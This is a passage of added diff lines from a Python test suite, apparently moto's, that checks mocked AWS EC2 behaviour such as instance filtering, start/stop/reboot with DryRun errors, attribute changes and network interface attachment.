for instance in reservations[0].instances] + instance_ids.should.equal([instance2.id]) + + reservations = conn.get_all_reservations( + [instance2.id], filters={""instance-state-name"": ""terminated""} + ) + list(reservations).should.equal([]) + + # get_all_reservations should still return all 3 + reservations = conn.get_all_reservations() + reservations[0].instances.should.have.length_of(3) + + conn.get_all_reservations.when.called_with( + filters={""not-implemented-filter"": ""foobar""} + ).should.throw(NotImplementedError) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_instance_id(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + + reservations = conn.get_all_reservations(filters={""instance-id"": instance1.id}) + # get_all_reservations should return just instance1 + reservations[0].instances.should.have.length_of(1) + reservations[0].instances[0].id.should.equal(instance1.id) + + reservations = conn.get_all_reservations( + filters={""instance-id"": [instance1.id, instance2.id]} + ) + # get_all_reservations should return two + reservations[0].instances.should.have.length_of(2) + + reservations = conn.get_all_reservations(filters={""instance-id"": ""non-existing-id""}) + reservations.should.have.length_of(0) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_instance_type(): + conn = boto.connect_ec2() + reservation1 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""m1.small"") + instance1 = reservation1.instances[0] + reservation2 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""m1.small"") + instance2 = reservation2.instances[0] + reservation3 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""t1.micro"") + instance3 = reservation3.instances[0] + + reservations = conn.get_all_reservations(filters={""instance-type"": ""m1.small""}) + # get_all_reservations should return instance1,2 + reservations.should.have.length_of(2) + reservations[0].instances.should.have.length_of(1) + reservations[1].instances.should.have.length_of(1) + instance_ids = 
[reservations[0].instances[0].id, reservations[1].instances[0].id] + set(instance_ids).should.equal(set([instance1.id, instance2.id])) + + reservations = conn.get_all_reservations(filters={""instance-type"": ""t1.micro""}) + # get_all_reservations should return one + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(1) + reservations[0].instances[0].id.should.equal(instance3.id) + + reservations = conn.get_all_reservations( + filters={""instance-type"": [""t1.micro"", ""m1.small""]} + ) + reservations.should.have.length_of(3) + reservations[0].instances.should.have.length_of(1) + reservations[1].instances.should.have.length_of(1) + reservations[2].instances.should.have.length_of(1) + instance_ids = [ + reservations[0].instances[0].id, + reservations[1].instances[0].id, + reservations[2].instances[0].id, + ] + set(instance_ids).should.equal(set([instance1.id, instance2.id, instance3.id])) + + reservations = conn.get_all_reservations(filters={""instance-type"": ""bogus""}) + # bogus instance-type should return none + reservations.should.have.length_of(0) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_reason_code(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + instance1.stop() + instance2.terminate() + + reservations = conn.get_all_reservations( + filters={""state-reason-code"": ""Client.UserInitiatedShutdown""} + ) + # get_all_reservations should return instance1 and instance2 + reservations[0].instances.should.have.length_of(2) + set([instance1.id, instance2.id]).should.equal( + set([i.id for i in reservations[0].instances]) + ) + + reservations = conn.get_all_reservations(filters={""state-reason-code"": """"}) + # get_all_reservations should return instance 3 + reservations[0].instances.should.have.length_of(1) + reservations[0].instances[0].id.should.equal(instance3.id) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_source_dest_check(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2) + instance1, instance2 = reservation.instances + conn.modify_instance_attribute( + instance1.id, attribute=""sourceDestCheck"", value=False + ) + + source_dest_check_false = conn.get_all_reservations( + filters={""source-dest-check"": ""false""} + ) + source_dest_check_true = conn.get_all_reservations( + filters={""source-dest-check"": ""true""} + ) + + source_dest_check_false[0].instances.should.have.length_of(1) + source_dest_check_false[0].instances[0].id.should.equal(instance1.id) + + source_dest_check_true[0].instances.should.have.length_of(1) + source_dest_check_true[0].instances[0].id.should.equal(instance2.id) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_vpc_id(): + conn = boto.connect_vpc(""the_key"", ""the_secret"") + vpc1 = conn.create_vpc(""10.0.0.0/16"") + subnet1 = conn.create_subnet(vpc1.id, ""10.0.0.0/27"") + reservation1 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet1.id) + instance1 = reservation1.instances[0] + + vpc2 = conn.create_vpc(""10.1.0.0/16"") + subnet2 = conn.create_subnet(vpc2.id, ""10.1.0.0/27"") + reservation2 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet2.id) + instance2 = reservation2.instances[0] + + reservations1 = conn.get_all_reservations(filters={""vpc-id"": vpc1.id}) + reservations1.should.have.length_of(1) + reservations1[0].instances.should.have.length_of(1) + 
reservations1[0].instances[0].id.should.equal(instance1.id) + reservations1[0].instances[0].vpc_id.should.equal(vpc1.id) + reservations1[0].instances[0].subnet_id.should.equal(subnet1.id) + + reservations2 = conn.get_all_reservations(filters={""vpc-id"": vpc2.id}) + reservations2.should.have.length_of(1) + reservations2[0].instances.should.have.length_of(1) + reservations2[0].instances[0].id.should.equal(instance2.id) + reservations2[0].instances[0].vpc_id.should.equal(vpc2.id) + reservations2[0].instances[0].subnet_id.should.equal(subnet2.id) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_architecture(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=1) + instance = reservation.instances + + reservations = conn.get_all_reservations(filters={""architecture"": ""x86_64""}) + # get_all_reservations should return the instance + reservations[0].instances.should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_image_id(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + conn = boto3.resource(""ec2"", ""us-east-1"") + conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1) + + reservations = client.describe_instances( + Filters=[{""Name"": ""image-id"", ""Values"": [EXAMPLE_AMI_ID]}] + )[""Reservations""] + reservations[0][""Instances""].should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_account_id(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + conn = boto3.resource(""ec2"", ""us-east-1"") + conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1) + + reservations = client.describe_instances( + Filters=[{""Name"": ""owner-id"", ""Values"": [""123456789012""]}] + )[""Reservations""] + + reservations[0][""Instances""].should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_private_dns(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + conn = boto3.resource(""ec2"", ""us-east-1"") + conn.create_instances( + ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress=""127.0.0.1"" + ) + reservations = client.describe_instances( + Filters=[{""Name"": ""private-dns-name"", ""Values"": [""ip-10-0-0-1.ec2.internal""]}] + )[""Reservations""] + reservations[0][""Instances""].should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_ni_private_dns(): + client = boto3.client(""ec2"", region_name=""us-west-2"") + conn = boto3.resource(""ec2"", ""us-west-2"") + conn.create_instances( + ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress=""127.0.0.1"" + ) + reservations = client.describe_instances( + Filters=[ + { + ""Name"": ""network-interface.private-dns-name"", + ""Values"": [""ip-10-0-0-1.us-west-2.compute.internal""], + } + ] + )[""Reservations""] + reservations[0][""Instances""].should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_instance_group_name(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + client.create_security_group(Description=""test"", GroupName=""test_sg"") + client.run_instances( + ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=[""test_sg""] + ) + reservations = client.describe_instances( + Filters=[{""Name"": ""instance.group-name"", ""Values"": [""test_sg""]}] + )[""Reservations""] + reservations[0][""Instances""].should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_instance_group_id(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + create_sg = 
client.create_security_group(Description=""test"", GroupName=""test_sg"") + group_id = create_sg[""GroupId""] + client.run_instances( + ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=[""test_sg""] + ) + reservations = client.describe_instances( + Filters=[{""Name"": ""instance.group-id"", ""Values"": [group_id]}] + )[""Reservations""] + reservations[0][""Instances""].should.have.length_of(1) + + +@mock_ec2 +def test_get_instances_filtering_by_subnet_id(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + + vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"") + subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"") + + resp = client.create_vpc(CidrBlock=str(vpc_cidr),) + vpc_id = resp[""Vpc""][""VpcId""] + + resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id) + subnet_id = resp[""Subnet""][""SubnetId""] + + client.run_instances( + ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id, + ) + + reservations = client.describe_instances( + Filters=[{""Name"": ""subnet-id"", ""Values"": [subnet_id]}] + )[""Reservations""] + reservations.should.have.length_of(1) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_tag(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + instance1.add_tag(""tag1"", ""value1"") + instance1.add_tag(""tag2"", ""value2"") + instance2.add_tag(""tag1"", ""value1"") + instance2.add_tag(""tag2"", ""wrong value"") + instance3.add_tag(""tag2"", ""value2"") + + reservations = conn.get_all_reservations(filters={""tag:tag0"": ""value0""}) + # get_all_reservations should return no instances + reservations.should.have.length_of(0) + + reservations = conn.get_all_reservations(filters={""tag:tag1"": ""value1""}) + # get_all_reservations should return both instances with this tag value + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(2) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance2.id) + + reservations = conn.get_all_reservations( + filters={""tag:tag1"": ""value1"", ""tag:tag2"": ""value2""} + ) + # get_all_reservations should return the instance with both tag values + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(1) + reservations[0].instances[0].id.should.equal(instance1.id) + + reservations = conn.get_all_reservations(filters={""tag:tag2"": [""value2"", ""bogus""]}) + # get_all_reservations should return both instances with one of the + # acceptable tag values + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(2) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance3.id) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_tag_value(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + instance1.add_tag(""tag1"", ""value1"") + instance1.add_tag(""tag2"", ""value2"") + instance2.add_tag(""tag1"", ""value1"") + 
instance2.add_tag(""tag2"", ""wrong value"") + instance3.add_tag(""tag2"", ""value2"") + + reservations = conn.get_all_reservations(filters={""tag-value"": ""value0""}) + # get_all_reservations should return no instances + reservations.should.have.length_of(0) + + reservations = conn.get_all_reservations(filters={""tag-value"": ""value1""}) + # get_all_reservations should return both instances with this tag value + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(2) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance2.id) + + reservations = conn.get_all_reservations( + filters={""tag-value"": [""value2"", ""value1""]} + ) + # get_all_reservations should return both instances with one of the + # acceptable tag values + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(3) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance2.id) + reservations[0].instances[2].id.should.equal(instance3.id) + + reservations = conn.get_all_reservations(filters={""tag-value"": [""value2"", ""bogus""]}) + # get_all_reservations should return both instances with one of the + # acceptable tag values + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(2) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance3.id) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_tag_name(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + instance1.add_tag(""tag1"") + instance1.add_tag(""tag2"") + instance2.add_tag(""tag1"") + instance2.add_tag(""tag2X"") + instance3.add_tag(""tag3"") + + reservations = conn.get_all_reservations(filters={""tag-key"": ""tagX""}) + # get_all_reservations should return no instances + reservations.should.have.length_of(0) + + reservations = conn.get_all_reservations(filters={""tag-key"": ""tag1""}) + # get_all_reservations should return both instances with this tag value + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(2) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance2.id) + + reservations = conn.get_all_reservations(filters={""tag-key"": [""tag1"", ""tag3""]}) + # get_all_reservations should return both instances with one of the + # acceptable tag values + reservations.should.have.length_of(1) + reservations[0].instances.should.have.length_of(3) + reservations[0].instances[0].id.should.equal(instance1.id) + reservations[0].instances[1].id.should.equal(instance2.id) + reservations[0].instances[2].id.should.equal(instance3.id) + + +@mock_ec2_deprecated +def test_instance_start_and_stop(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2) + instances = reservation.instances + instances.should.have.length_of(2) + + instance_ids = [instance.id for instance in instances] + + with pytest.raises(EC2ResponseError) as ex: + stopped_instances = conn.stop_instances(instance_ids, dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the StopInstance operation: Request would have succeeded, 
but DryRun flag is set"" + ) + + stopped_instances = conn.stop_instances(instance_ids) + + for instance in stopped_instances: + instance.state.should.equal(""stopping"") + + with pytest.raises(EC2ResponseError) as ex: + started_instances = conn.start_instances([instances[0].id], dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the StartInstance operation: Request would have succeeded, but DryRun flag is set"" + ) + + started_instances = conn.start_instances([instances[0].id]) + started_instances[0].state.should.equal(""pending"") + + +@mock_ec2_deprecated +def test_instance_reboot(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + with pytest.raises(EC2ResponseError) as ex: + instance.reboot(dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the RebootInstance operation: Request would have succeeded, but DryRun flag is set"" + ) + + instance.reboot() + instance.state.should.equal(""pending"") + + +@mock_ec2_deprecated +def test_instance_attribute_instance_type(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + with pytest.raises(EC2ResponseError) as ex: + instance.modify_attribute(""instanceType"", ""m1.small"", dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the ModifyInstanceType operation: Request would have succeeded, but DryRun flag is set"" + ) + + instance.modify_attribute(""instanceType"", ""m1.small"") + + instance_attribute = instance.get_attribute(""instanceType"") + instance_attribute.should.be.a(InstanceAttribute) + instance_attribute.get(""instanceType"").should.equal(""m1.small"") + + +@mock_ec2_deprecated +def test_modify_instance_attribute_security_groups(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + sg_id = conn.create_security_group( + ""test security group"", ""this is a test security group"" + ).id + sg_id2 = conn.create_security_group( + ""test security group 2"", ""this is a test security group 2"" + ).id + + with pytest.raises(EC2ResponseError) as ex: + instance.modify_attribute(""groupSet"", [sg_id, sg_id2], dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set"" + ) + + instance.modify_attribute(""groupSet"", [sg_id, sg_id2]) + + instance_attribute = instance.get_attribute(""groupSet"") + instance_attribute.should.be.a(InstanceAttribute) + group_list = instance_attribute.get(""groupSet"") + any(g.id == sg_id for g in group_list).should.be.ok + any(g.id == sg_id2 for g in group_list).should.be.ok + + +@mock_ec2_deprecated +def test_instance_attribute_user_data(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + with 
pytest.raises(EC2ResponseError) as ex: + instance.modify_attribute(""userData"", ""this is my user data"", dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the ModifyUserData operation: Request would have succeeded, but DryRun flag is set"" + ) + + instance.modify_attribute(""userData"", ""this is my user data"") + + instance_attribute = instance.get_attribute(""userData"") + instance_attribute.should.be.a(InstanceAttribute) + instance_attribute.get(""userData"").should.equal(""this is my user data"") + + +@mock_ec2_deprecated +def test_instance_attribute_source_dest_check(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + # Default value is true + instance.sourceDestCheck.should.equal(""true"") + + instance_attribute = instance.get_attribute(""sourceDestCheck"") + instance_attribute.should.be.a(InstanceAttribute) + instance_attribute.get(""sourceDestCheck"").should.equal(True) + + # Set to false (note: Boto converts bool to string, eg 'false') + + with pytest.raises(EC2ResponseError) as ex: + instance.modify_attribute(""sourceDestCheck"", False, dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the ModifySourceDestCheck operation: Request would have succeeded, but DryRun flag is set"" + ) + + instance.modify_attribute(""sourceDestCheck"", False) + + instance.update() + instance.sourceDestCheck.should.equal(""false"") + + instance_attribute = instance.get_attribute(""sourceDestCheck"") + instance_attribute.should.be.a(InstanceAttribute) + instance_attribute.get(""sourceDestCheck"").should.equal(False) + + # Set back to true + instance.modify_attribute(""sourceDestCheck"", True) + + instance.update() + instance.sourceDestCheck.should.equal(""true"") + + instance_attribute = instance.get_attribute(""sourceDestCheck"") + instance_attribute.should.be.a(InstanceAttribute) + instance_attribute.get(""sourceDestCheck"").should.equal(True) + + +@mock_ec2_deprecated +def test_user_data_with_run_instance(): + user_data = b""some user data"" + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, user_data=user_data) + instance = reservation.instances[0] + + instance_attribute = instance.get_attribute(""userData"") + instance_attribute.should.be.a(InstanceAttribute) + retrieved_user_data = instance_attribute.get(""userData"").encode(""utf-8"") + decoded_user_data = decode_method(retrieved_user_data) + decoded_user_data.should.equal(b""some user data"") + + +@mock_ec2_deprecated +def test_run_instance_with_security_group_name(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + + with pytest.raises(EC2ResponseError) as ex: + group = conn.create_security_group(""group1"", ""some description"", dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the CreateSecurityGroup operation: Request would have succeeded, but DryRun flag is set"" + ) + + group = conn.create_security_group(""group1"", ""some description"") + + reservation = conn.run_instances(EXAMPLE_AMI_ID, security_groups=[""group1""]) + instance = reservation.instances[0] + + 
instance.groups[0].id.should.equal(group.id) + instance.groups[0].name.should.equal(""group1"") + + +@mock_ec2_deprecated +def test_run_instance_with_security_group_id(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + group = conn.create_security_group(""group1"", ""some description"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, security_group_ids=[group.id]) + instance = reservation.instances[0] + + instance.groups[0].id.should.equal(group.id) + instance.groups[0].name.should.equal(""group1"") + + +@mock_ec2_deprecated +def test_run_instance_with_instance_type(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""t1.micro"") + instance = reservation.instances[0] + + instance.instance_type.should.equal(""t1.micro"") + + +@mock_ec2_deprecated +def test_run_instance_with_default_placement(): + conn = boto.ec2.connect_to_region(""us-east-1"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + instance.placement.should.equal(""us-east-1a"") + + +@mock_ec2_deprecated +def test_run_instance_with_placement(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, placement=""us-east-1b"") + instance = reservation.instances[0] + + instance.placement.should.equal(""us-east-1b"") + + +@mock_ec2 +def test_run_instance_with_subnet_boto3(): + client = boto3.client(""ec2"", region_name=""eu-central-1"") + + ip_networks = [ + (ipaddress.ip_network(""10.0.0.0/16""), ipaddress.ip_network(""10.0.99.0/24"")), + ( + ipaddress.ip_network(""192.168.42.0/24""), + ipaddress.ip_network(""192.168.42.0/25""), + ), + ] + + # Tests instances are created with the correct IPs + for vpc_cidr, subnet_cidr in ip_networks: + resp = client.create_vpc( + CidrBlock=str(vpc_cidr), + AmazonProvidedIpv6CidrBlock=False, + DryRun=False, + InstanceTenancy=""default"", + ) + vpc_id = resp[""Vpc""][""VpcId""] + + resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id) + subnet_id = resp[""Subnet""][""SubnetId""] + + resp = client.run_instances( + ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id + ) + instance = resp[""Instances""][0] + instance[""SubnetId""].should.equal(subnet_id) + + priv_ipv4 = ipaddress.ip_address(six.text_type(instance[""PrivateIpAddress""])) + subnet_cidr.should.contain(priv_ipv4) + + +@mock_ec2 +def test_run_instance_with_specified_private_ipv4(): + client = boto3.client(""ec2"", region_name=""eu-central-1"") + + vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"") + subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"") + + resp = client.create_vpc( + CidrBlock=str(vpc_cidr), + AmazonProvidedIpv6CidrBlock=False, + DryRun=False, + InstanceTenancy=""default"", + ) + vpc_id = resp[""Vpc""][""VpcId""] + + resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id) + subnet_id = resp[""Subnet""][""SubnetId""] + + resp = client.run_instances( + ImageId=EXAMPLE_AMI_ID, + MaxCount=1, + MinCount=1, + SubnetId=subnet_id, + PrivateIpAddress=""127.0.0.1"", + ) + instance = resp[""Instances""][0] + instance[""SubnetId""].should.equal(subnet_id) + instance[""PrivateIpAddress""].should.equal(""127.0.0.1"") + + +@mock_ec2 +def test_run_instance_mapped_public_ipv4(): + client = boto3.client(""ec2"", region_name=""eu-central-1"") + + vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"") + subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"") + + resp = client.create_vpc( + CidrBlock=str(vpc_cidr), + 
AmazonProvidedIpv6CidrBlock=False, + DryRun=False, + InstanceTenancy=""default"", + ) + vpc_id = resp[""Vpc""][""VpcId""] + + resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id) + subnet_id = resp[""Subnet""][""SubnetId""] + client.modify_subnet_attribute( + SubnetId=subnet_id, MapPublicIpOnLaunch={""Value"": True} + ) + + resp = client.run_instances( + ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id + ) + instance = resp[""Instances""][0] + instance.should.contain(""PublicDnsName"") + instance.should.contain(""PublicIpAddress"") + len(instance[""PublicDnsName""]).should.be.greater_than(0) + len(instance[""PublicIpAddress""]).should.be.greater_than(0) + + +@mock_ec2_deprecated +def test_run_instance_with_nic_autocreated(): + conn = boto.connect_vpc(""the_key"", ""the_secret"") + vpc = conn.create_vpc(""10.0.0.0/16"") + subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"") + security_group1 = conn.create_security_group( + ""test security group #1"", ""this is a test security group"" + ) + security_group2 = conn.create_security_group( + ""test security group #2"", ""this is a test security group"" + ) + private_ip = ""127.0.0.1"" + + reservation = conn.run_instances( + EXAMPLE_AMI_ID, + subnet_id=subnet.id, + security_groups=[security_group1.name], + security_group_ids=[security_group2.id], + private_ip_address=private_ip, + ) + instance = reservation.instances[0] + + all_enis = conn.get_all_network_interfaces() + all_enis.should.have.length_of(1) + eni = all_enis[0] + + instance.interfaces.should.have.length_of(1) + instance.interfaces[0].id.should.equal(eni.id) + + instance.subnet_id.should.equal(subnet.id) + instance.groups.should.have.length_of(2) + set([group.id for group in instance.groups]).should.equal( + set([security_group1.id, security_group2.id]) + ) + + eni.subnet_id.should.equal(subnet.id) + eni.groups.should.have.length_of(2) + set([group.id for group in eni.groups]).should.equal( + set([security_group1.id, security_group2.id]) + ) + eni.private_ip_addresses.should.have.length_of(1) + eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip) + + +@mock_ec2_deprecated +def test_run_instance_with_nic_preexisting(): + conn = boto.connect_vpc(""the_key"", ""the_secret"") + vpc = conn.create_vpc(""10.0.0.0/16"") + subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"") + security_group1 = conn.create_security_group( + ""test security group #1"", ""this is a test security group"" + ) + security_group2 = conn.create_security_group( + ""test security group #2"", ""this is a test security group"" + ) + private_ip = ""127.0.0.1"" + eni = conn.create_network_interface( + subnet.id, private_ip, groups=[security_group1.id] + ) + + # Boto requires NetworkInterfaceCollection of NetworkInterfaceSpecifications... + # annoying, but generates the desired querystring. 
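+ # (Editor's note, not in the original test: boto 2's run_instances has no
+ # parameter that takes a bare ENI id. The pre-created interface must be
+ # wrapped in a NetworkInterfaceSpecification, where device_index=0 makes it
+ # the primary interface, and grouped into a NetworkInterfaceCollection,
+ # which boto serializes into the NetworkInterface.N.* query parameters
+ # that the EC2 RunInstances API expects.)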
+ from boto.ec2.networkinterface import ( + NetworkInterfaceSpecification, + NetworkInterfaceCollection, + ) + + interface = NetworkInterfaceSpecification( + network_interface_id=eni.id, device_index=0 + ) + interfaces = NetworkInterfaceCollection(interface) + # end Boto objects + + reservation = conn.run_instances( + EXAMPLE_AMI_ID, + network_interfaces=interfaces, + security_group_ids=[security_group2.id], + ) + instance = reservation.instances[0] + + instance.subnet_id.should.equal(subnet.id) + + all_enis = conn.get_all_network_interfaces() + all_enis.should.have.length_of(1) + + instance.interfaces.should.have.length_of(1) + instance_eni = instance.interfaces[0] + instance_eni.id.should.equal(eni.id) + + instance_eni.subnet_id.should.equal(subnet.id) + instance_eni.groups.should.have.length_of(2) + set([group.id for group in instance_eni.groups]).should.equal( + set([security_group1.id, security_group2.id]) + ) + instance_eni.private_ip_addresses.should.have.length_of(1) + instance_eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip) + + +@requires_boto_gte(""2.32.0"") +@mock_ec2_deprecated +def test_instance_with_nic_attach_detach(): + conn = boto.connect_vpc(""the_key"", ""the_secret"") + vpc = conn.create_vpc(""10.0.0.0/16"") + subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"") + + security_group1 = conn.create_security_group( + ""test security group #1"", ""this is a test security group"" + ) + security_group2 = conn.create_security_group( + ""test security group #2"", ""this is a test security group"" + ) + + reservation = conn.run_instances( + EXAMPLE_AMI_ID, security_group_ids=[security_group1.id] + ) + instance = reservation.instances[0] + + eni = conn.create_network_interface(subnet.id, groups=[security_group2.id]) + + # Check initial instance and ENI data + instance.interfaces.should.have.length_of(1) + + eni.groups.should.have.length_of(1) + set([group.id for group in eni.groups]).should.equal(set([security_group2.id])) + + # Attach + with pytest.raises(EC2ResponseError) as ex: + conn.attach_network_interface(eni.id, instance.id, device_index=1, dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the AttachNetworkInterface operation: Request would have succeeded, but DryRun flag is set"" + ) + + conn.attach_network_interface(eni.id, instance.id, device_index=1) + + # Check attached instance and ENI data + instance.update() + instance.interfaces.should.have.length_of(2) + instance_eni = instance.interfaces[1] + instance_eni.id.should.equal(eni.id) + instance_eni.groups.should.have.length_of(2) + set([group.id for group in instance_eni.groups]).should.equal( + set([security_group1.id, security_group2.id]) + ) + + eni = conn.get_all_network_interfaces(filters={""network-interface-id"": eni.id})[0] + eni.groups.should.have.length_of(2) + set([group.id for group in eni.groups]).should.equal( + set([security_group1.id, security_group2.id]) + ) + + # Detach + with pytest.raises(EC2ResponseError) as ex: + conn.detach_network_interface(instance_eni.attachment.id, dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the DetachNetworkInterface operation: Request would have succeeded, but DryRun flag is set"" + ) + + conn.detach_network_interface(instance_eni.attachment.id) + + # Check 
